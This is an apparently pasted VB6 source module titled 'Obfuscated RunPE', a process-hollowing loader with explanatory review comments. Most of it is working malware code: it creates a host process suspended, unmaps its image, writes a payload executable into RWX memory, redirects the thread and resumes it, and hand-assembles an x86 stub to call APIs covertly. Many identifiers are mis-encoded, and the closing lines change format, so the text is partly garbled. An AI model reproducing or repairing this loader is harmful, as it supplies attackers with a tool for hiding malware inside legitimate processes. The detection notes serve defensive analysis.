Obfuscated RunPE

By: a guest | Mar 22nd, 2010 | Syntax: VisualBasic | Size: 7.87 KB | Hits: 50 | Expires: Never
Attribute VB_Name = "Module1"
Option Explicit

' Process-hollowing ("RunPE") loader, VB6, 32-bit only.
' Flow (see Injec): start a host EXE with its main thread suspended, unmap
' the image at the payload's preferred ImageBase inside the host, allocate
' an RWX region there, copy the payload's headers and sections in, redirect
' the suspended thread to the payload entry point and resume it.
'
' NOTE(review): many local identifiers in this paste are mis-encoded (each
' byte shifted by &H80, e.g. "ÃáììÁÐÉ" is CallAPI, "ÏËÍÊÉ" is OKMJI). The
' declarations carry the shifted names while the statements use the ASCII
' ones, so exactly as shown the module does not compile under Option Explicit.
'
' NOTE(review): VB6 resolves Declare statements itself at run time, and the
' APIs used through CallAPI are passed as plain string literals, so every
' API name used by this loader ("NtUnmapViewOfSection", "VirtualAllocEx",
' "SetThreadContext", ...) is present as a readable string in the compiled
' binary; the dynamic resolution hides nothing from static string scanning.

' x86 CONTEXT_FULL = CONTEXT_i386 (&H10000) Or CONTROL (1) Or INTEGER (2)
' Or SEGMENTS (4); selects the registers Get/SetThreadContext transfer.
Private Const CONTEXT_FULL As Long = &H10007
' Not referenced in the code shown (ThisExe uses a literal 256 instead).
Private Const MAX_PATH As Integer = 260
' CreateProcess flag: the host's main thread is created but not started,
' so its image can be replaced before any host code runs.
Private Const CREATE_SUSPENDED As Long = &H4
' VirtualAllocEx allocation type and protection. The whole payload image is
' mapped as one PAGE_EXECUTE_READWRITE region rather than with per-section
' protections, a common memory-scanner indicator.
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

' APIs bound via Declare. Only CreateProcessA and WriteProcessMemory are
' called this way; the rest of the hollowing sequence goes through CallAPI.
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' Declared but not used in the code shown.
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long

' Used by CallAPI to emit its call stub one field at a time, and by Injec
' to copy PE header structures out of the payload buffer.
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
' CallWindowProcA is abused as a generic "call this address" primitive:
' CallAPI points it at a Byte array holding a hand-built x86 stub.
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
' Run-time resolution of every other API (see CallAPI).
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

' Win32 SECURITY_ATTRIBUTES. Not referenced in the code shown: Injec passes
' 0 for both lpProcessAttributes and lpThreadAttributes to CreateProcessA.
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

' Win32 STARTUPINFO (ANSI, 32-bit layout). Injec only sets cb = Len(...)
' and leaves every other field zero, so the host process is created with
' default window settings and no redirected standard handles.
Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Win32 PROCESS_INFORMATION, filled by CreateProcessA. Injec uses hProcess
' for the remote memory operations and hThread for the context swap and
' ResumeThread. Neither handle is closed anywhere in the code shown.
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type

' x87 FPU state block embedded in the 32-bit CONTEXT below (RegisterArea is
' 80 bytes). Carried along by Get/SetThreadContext; not touched directly.
Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type

' Win32 CONTEXT for 32-bit x86 (this loader is 32-bit only: every register
' and pointer is a Long). Injec sets ContextFlags = CONTEXT_FULL, fetches the
' suspended main thread's context, reads Ebx and rewrites Eax, then writes
' the context back with SetThreadContext.
Private Type CONTEXT
    ContextFlags As Long

    ' Debug registers.
    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long

    ' x87 state.
    FloatSave As FLOATING_SAVE_AREA
    ' Segment registers.
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    ' Integer registers.
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    ' Control registers.
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type

' PE/COFF DOS header, 64 bytes. Injec copies the first 64 bytes of the
' payload into it and uses only e_lfanew (file offset of the PE signature).
' e_magic ("MZ") is never validated, so a non-PE buffer is parsed blindly.
Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

' PE COFF file header, 20 bytes. Injec reads NumberOfSections to drive its
' section-copy loop. Machine is never checked, and SizeOfOptionalHeader is
' ignored in favour of the hard-coded 224/248 offsets used in Injec, so a
' PE32+ (64-bit) payload or a non-standard optional header is misparsed.
Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type

' One PE data-directory entry (RVA + size), 8 bytes. Declared to give the
' optional header its correct size; no directory (imports, relocations,
' TLS, ...) is processed by this loader.
Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

' PE32 (32-bit) optional header, 224 bytes. Injec uses ImageBase (where the
' payload is mapped in the host and the address unmapped there first),
' SizeOfImage (size of the RWX allocation), SizeOfHeaders (bytes copied for
' the header block) and AddressOfEntryPoint (new thread start). The
' DataDirectory array is never consulted. "SizeOfUnitializedData" is a
' typo for SizeOfUninitializedData; harmless since the field is unused.
Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ' NT additional fields.
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

' PE32 NT headers: 4-byte signature + 20-byte file header + 224-byte
' optional header = 248 bytes, which is the literal Injec copies from
' bvBuff(e_lfanew) and the offset it adds to find the first section header.
' The "PE\0\0" Signature is never validated.
Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

' PE section header, 40 bytes (Len() of this Type, also the 40 * i stride
' Injec uses to walk the section table). Injec copies SizeOfRawData bytes
' from file offset PointerToRawData to ImageBase + VirtualAddress in the
' host; VirtualSize and characteristics are ignored, and neither offset nor
' size is bounds-checked against the payload buffer.
Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics As Long
End Type

' CallAPI (shown here with its name mis-encoded as "ÃáììÁÐÉ"; the body
' assigns to CallAPI). Resolves sMod in sLib with LoadLibraryA/GetProcAddress
' and calls it with the given stdcall arguments without a Declare, by
' assembling a tiny x86 stub in a Byte array and invoking it through
' CallWindowProcA. Returns the API's EAX, or 0 if the export is not found.
'
' Local names as they appear in the statements: OKMJI = write cursor into
' the stub, EDCVFR = the stub buffer (a fixed-size Byte array whose bound is
' garbled in this paste), WERDF = resolved API address. The Dim lines carry
' the mis-encoded forms, so as pasted the body references undeclared names.
'
' Stub layout (stack on entry: [ret][hWnd][Msg][wParam][lParam]):
'   58 59 59 59   pop eax ; pop ecx x3   -> save return address, drop 3 args
'   59 50         pop ecx ; push eax     -> drop 4th arg, restore ret addr
'   68 imm32 ...  push Params(i)         -> in reverse order (stdcall)
'   E8 rel32      call WERDF
'   C3            ret                    -> back into CallWindowProcA
' Because the stub already popped all four arguments, its final ret is
' equivalent to the "ret 16" CallWindowProcA expects from a WNDPROC.
'
' NOTE(review): the stub executes from ordinary VB data memory, so it faults
' under DEP if DEP is enforced for the process (VB6 binaries are commonly
' not NX-opted-in, which is presumably why this worked in 2010). Params are
' narrowed with CLng, so this is 32-bit only. Every API name passed in is a
' string literal at the call site and therefore visible to static analysis.
Private Function  ÃáììÁÐÉ (ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    Dim  ÏËÍÊÉ  As Long
    Dim  ÅÄÃÖÆÒ¨¦ÈÅð°¦ ­ ±©  As Byte
    Dim i As Long
    Dim  ×ÅÒÄÆ  As Long

    ' Resolve the export; a failed lookup returns 0 to the caller silently.
    WERDF = GetProcAddress(LoadLibraryA(sLib), sMod)
    If  ×ÅÒÄÆ  = 0 Then Exit Function

    OKMJI = VarPtr(EDCVFR(0))
    ' 58 59 59 59 : pop eax / pop ecx / pop ecx / pop ecx
    RtlMoveMemory ByVal OKMJI, &H59595958, &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
    ' 59 50 : pop ecx / push eax
    RtlMoveMemory ByVal OKMJI, &H5059, &H2:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 2
    ' push each argument, last first (stdcall calling convention).
    For i = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal OKMJI, &H68, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
        RtlMoveMemory ByVal OKMJI, CLng(Params(i)), &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
    Next
    ' E8 rel32 : call WERDF. rel32 is relative to the end of the call
    ' instruction, i.e. the cursor position of the rel32 field plus 4.
    RtlMoveMemory ByVal OKMJI, &HE8, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
    RtlMoveMemory ByVal OKMJI,  ×ÅÒÄÆ  -  ÏËÍÊÉ  - 4, &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
    ' C3 : ret (EAX still holds the API's return value).
    RtlMoveMemory ByVal OKMJI, &HC3, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
    ' Jump into the stub via CallWindowProcA; the four dummy arguments are
    ' exactly what the stub's pops discard.
    CallAPI = CallWindowProcA(VarPtr(EDCVFR(0)), 0, 0, 0, 0)
End Function

' Injec: process hollowing. Runs the PE32 image in bvBuff() inside a new
' instance of sHost, started suspended and with its own image replaced.
' sHost     : path of the host executable to create (presumably the loader
'             itself, given ThisExe below; the caller is not shown).
' bvBuff()  : raw payload PE file bytes (see StrToBytArray).
' parameter : appended to the host command line, after a single space.
'
' Local names as used in the statements: ASDFRE = DOS header, SDEWQC = NT
' headers, AXCFRES = current section header, VVVVVV = STARTUPINFO,
' Pi = PROCESS_INFORMATION, Ctx = CONTEXT. The Dim lines show the
' mis-encoded forms, so as pasted these are undeclared under Option Explicit.
'
' Detection points, in order: CreateProcess with CREATE_SUSPENDED;
' NtUnmapViewOfSection on the host; VirtualAllocEx of an RWX region at the
' payload's preferred base; WriteProcessMemory of a PE header followed by
' its sections; GetThreadContext; a 4-byte write to PEB+8; SetThreadContext
' changing EAX to a new entry point; ResumeThread.
'
' NOTE(review): nothing here is error-checked. A failed CreateProcessA,
' NtUnmapViewOfSection or VirtualAllocEx (e.g. the preferred ImageBase is
' not free in the host) is not detected and the subsequent writes proceed
' anyway; no relocations are applied, so the payload must load at its
' preferred base. Neither process nor thread handle is closed. No MZ/PE
' signature, bitness or buffer-bounds checks are performed on bvBuff.
Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
    Dim i As Long
    Dim  ÁÓÄÆÒÅ  As IMAGE_DOS_HEADER
    Dim  ÓÄÅ×Ñà As IMAGE_NT_HEADERS
    Dim  ÁØÃÆÒÅÓ  As IMAGE_SECTION_HEADER
    Dim  ÖÖÖÖÖÖ  As STARTUPINFO
    Dim  Ðé  As PROCESS_INFORMATION
    Dim  Ãôø  As CONTEXT

    VVVVVV.cb = Len(VVVVVV)

    ' Parse the payload headers from the buffer: 64-byte DOS header, then
    ' 248-byte NT headers at e_lfanew (assumes a standard PE32 optional
    ' header; FileHeader.SizeOfOptionalHeader is not consulted).
    RtlMoveMemory ASDFRE, bvBuff(0), 64
    RtlMoveMemory SDEWQC, bvBuff(ASDFRE.e_lfanew), 248

    ' Create the host suspended so its main thread has not executed yet.
    CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, VVVVVV, Pi
    ' Unmap whatever is at the payload's preferred base in the host (its own
    ' image, if the two share a base), then allocate one RWX region of
    ' SizeOfImage bytes at that exact address.
    CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, SDEWQC.OptionalHeader.ImageBase
    CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, SDEWQC.OptionalHeader.ImageBase, SDEWQC.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    ' Copy the PE headers as-is to the base of the new region.
    WriteProcessMemory Pi.hProcess, ByVal SDEWQC.OptionalHeader.ImageBase, bvBuff(0), SDEWQC.OptionalHeader.SizeOfHeaders, 0

    ' Copy each section's raw data to its RVA. Section headers follow the
    ' NT headers at 40-byte intervals. Offsets/sizes from the file are
    ' trusted without checking them against UBound(bvBuff).
    For i = 0 To SDEWQC.FileHeader.NumberOfSections - 1
        RtlMoveMemory AXCFRES, bvBuff(ASDFRE.e_lfanew + 248 + 40 * i), Len(AXCFRES)
        WriteProcessMemory Pi.hProcess, ByVal SDEWQC.OptionalHeader.ImageBase + AXCFRES.VirtualAddress, bvBuff(AXCFRES.PointerToRawData), AXCFRES.SizeOfRawData, 0
    Next i

    ' Retarget the suspended main thread. At x86 initial-thread start EBX
    ' holds the PEB pointer and EAX the entry point the loader will jump to
    ' (per the Windows thread-start convention; verify for the target OS):
    ' PEB+8 (ImageBaseAddress) is patched to the payload base and EAX to the
    ' payload entry point. Import resolution and TLS are left to ntdll's
    ' process initialisation when the thread resumes.
    Ctx.ContextFlags = CONTEXT_FULL
    CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
    WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, SDEWQC.OptionalHeader.ImageBase, 4, 0
    Ctx.Eax = SDEWQC.OptionalHeader.ImageBase + SDEWQC.OptionalHeader.AddressOfEntryPoint
    CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
    CallAPI "kernel32", "ResumeThread", Pi.hThread
End Sub

  240. Public Function  ÓôòÔïÂùôÁòòáù (ByVal sStr As String) As Byte()
  241. Dim i As Long
  242. Dim  Âõææåò¨©  As Byte
  243. ReDim Buffer(Len(sStr) - 1)
  244. For i = 1 To Len(sStr)
  245. Buffer(i - 1) = Asc(Mid(sStr, i, 1))
  246. Next i
  247. StrToBytArray = Buffer
  248. End Function
  249.  
  250. Public Function  ÔèéóÅøå () As String
  251. Dim  ìÒåô  As Long
  252. Dim  âöÂõææ¨²µµ©  As Byte
  253. lRet =  ÃáììÁÐÉ ("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
  254. ThisExe = Left$(StrConv(bvBuff, vbUnicode), lRet)
  255. End Function